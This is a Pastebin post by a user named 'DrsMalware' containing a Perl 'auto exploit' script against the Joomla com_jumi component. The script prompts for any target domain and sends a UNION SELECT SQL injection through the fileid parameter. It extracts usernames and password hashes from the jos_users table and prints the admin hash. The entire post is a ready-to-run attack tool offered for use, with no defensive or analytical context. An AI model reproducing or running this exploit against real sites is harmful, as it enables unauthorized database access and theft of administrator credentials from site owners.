Advertisement
DrsMalware

[ Auto Exploit ] Joomla | Com_Jumi

Feb 19th, 2016
444
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.90 KB | None | 0 0
  1. #!/usr/bin/perl -w
  2. print " \n\n";
  3. print " Drs.Malware | Cyber-DB Indonesia | IndoXploiT \n\n";
  4. print "\n\n";
  5. print " Joomla Remote SQL Injection Exploit \n\n";
  6. use LWP::UserAgent;
  7. print "Domain Target = ";
  8. chomp(my $target=<STDIN>);
  9. $dzmind="concat(username,0x3a,password)";
  10. $sakkure="jos_users";
  11. $com="com_jumi";
  12. $cw="+UNION+SELECT+";
  13. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  14. $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
  15. $host = $target . "/index.php?option=".$com."&fileid=93&Itemid=117".$cw."1,".$dzmind.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/".$sakkure."+--+";
  16. $res = $b->request(HTTP::Request->new(GET=>$host));
  17. $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
  18. print "\n[+] Admin Account : $1\n\n";
  19. print "# Successfully Ojo Lali Karo Kancane #\n\n";
  20. }
  21. else{print "\n[-] Exploit Gagal Mbut... :( \n";
  22. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement